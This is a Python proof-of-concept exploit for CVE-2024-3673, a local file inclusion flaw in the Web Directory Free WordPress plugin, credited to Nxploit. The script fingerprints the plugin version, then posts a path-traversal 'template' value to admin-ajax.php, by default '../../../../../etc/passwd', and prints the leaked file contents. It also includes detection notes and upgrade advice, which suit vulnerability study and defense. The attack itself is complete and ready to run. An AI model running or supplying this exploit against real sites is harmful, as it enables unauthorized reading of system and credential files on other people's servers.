POC / CVE-2024-3673.py PY
import argparse
import re
import requests
from packaging import version



## Exploit script written by Nxploit | Khaled_alenazi



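def get_plugin_version(url: str) -> str | None:
    """Read the plugin's advertised version from its public ``readme.txt``.

    Requests ``<url>/wp-content/plugins/web-directory-free/readme.txt`` and
    extracts the three-part number that follows ``Stable tag:``.

    Args:
        url: Base URL of the WordPress installation.

    Returns:
        The version string (for example ``"1.7.2"``), or ``None`` when the
        request fails or no three-part ``Stable tag`` value is present.

    Note:
        The value comes from a static, self-reported file, so it is a hint
        and not proof of the code that is actually installed. A readme that
        is removed, blocked by the web server, or out of date yields ``None``
        or a misleading version; confirm against the plugin inventory when
        triaging a host.
    """
    version_url = f"{url}/wp-content/plugins/web-directory-free/readme.txt"
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    }
    try:
        # verify=False turns off TLS certificate validation, so the readme
        # content is not authenticated and could be altered in transit.
        response = requests.get(version_url, headers=headers, verify=False, timeout=10)
        response.raise_for_status()
    except requests.RequestException as e:
        print(f"Error fetching version info: {e}")
        return None

    # Only MAJOR.MINOR.PATCH tags are recognised; any other tag format is
    # reported as "not found" rather than guessed at.
    match = re.search(r"Stable tag:\s*(\d+\.\d+\.\d+)", response.text)
    if match is None:
        print("Could not find version information in readme.txt.")
        return None
    return match.group(1)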

def is_vulnerable(version_str: str) -> bool:
    """Report whether *version_str* is at or below the last affected release.

    The threshold used here is 1.7.2, matching the script's own description
    that releases before 1.7.3 are affected. Versions are compared with
    ``packaging.version`` ordering, not as plain strings.

    Args:
        version_str: Version text as extracted from the plugin readme.

    Returns:
        ``True`` when the parsed version is less than or equal to 1.7.2.
    """
    installed = version.parse(version_str)
    last_affected = version.parse("1.7.2")
    return installed <= last_affected

def exploit_vulnerability(url: str, target_file: str) -> None:
    """Send the CVE-2024-3673 proof-of-concept request and print the outcome.

    Posts a form body to ``<url>/wp-admin/admin-ajax.php`` with
    ``action=w2dc_controller_request`` and ``template`` set to *target_file*,
    then prints the response body when it contains the marker ``root:``.

    Args:
        url: Base URL of the WordPress installation.
        target_file: Value placed in the ``template`` form field.

    Detection and mitigation notes:
        The same fields are the ones to look for defensively: a POST to
        ``admin-ajax.php`` carrying ``action=w2dc_controller_request`` and a
        ``template`` value containing ``../`` sequences, wherever request
        bodies are logged or inspected. The script's description states the
        issue affects releases before 1.7.3, so upgrading the plugin to 1.7.3
        or later is the fix.

        ``root:`` is the only success signal checked, so the "failed" message
        is not evidence that a host is patched.
    """
    endpoint = f"{url}/wp-admin/admin-ajax.php"
    request_headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    form_body = f"from_set_ajax=1&action=w2dc_controller_request&template={target_file}"

    try:
        # TLS certificate validation is disabled for this request.
        reply = requests.post(endpoint, headers=request_headers, data=form_body, verify=False, timeout=10)
        reply.raise_for_status()
    except requests.RequestException as e:
        print(f"Error during exploitation: {e}")
        return

    if "root:" not in reply.text:
        print("Exploit failed or the server is not vulnerable.")
        return

    print("Exploit successful. Extracted content:")
    print(reply.text)

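def main() -> None:
    """Parse the command line, check the plugin version, then run the PoC.

    The proof-of-concept request is sent only when the readme-reported
    version is at or below the affected threshold. When the version cannot
    be determined the run is reported as inconclusive instead of "not
    vulnerable", because a missing or blocked readme says nothing about
    whether the installed plugin is patched.
    """
    parser = argparse.ArgumentParser(description="The Web Directory Free WordPress plugin before version 1.7.3 does not validate a parameter before using it in an `include()` function, which could lead to Local File Inclusion (LFI) vulnerabilities.")
    parser.add_argument("--url", "-u", required=True, help="Target URL (e.g., http://192.168.100.74:888/wordpress)")
    parser.add_argument("--file", "-f", default="../../../../../etc/passwd", help="Target file to read (default: ../../../../../etc/passwd)")
    args = parser.parse_args()

    # The helpers call requests with verify=False; this silences the
    # resulting urllib3 warnings for the whole process.
    requests.packages.urllib3.disable_warnings()

    print("Checking if the site is vulnerable...")
    plugin_version = get_plugin_version(args.url)
    if plugin_version is None:
        # Unknown is not the same as patched: do not report a clean result
        # when the version lookup itself failed.
        print("Could not determine the plugin version; the result is inconclusive. Exploitation will not proceed.")
        return

    if is_vulnerable(plugin_version):
        print("The site is vulnerable. Attempting to exploit the vulnerability...")
        exploit_vulnerability(args.url, args.file)
    else:
        # Based solely on the readme's Stable tag, which is self-reported.
        print("The site is not vulnerable. Exploitation will not proceed.")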

# Run the command-line workflow only when the file is executed as a script,
# so importing the module does not send any requests.
if __name__ == "__main__":
    main()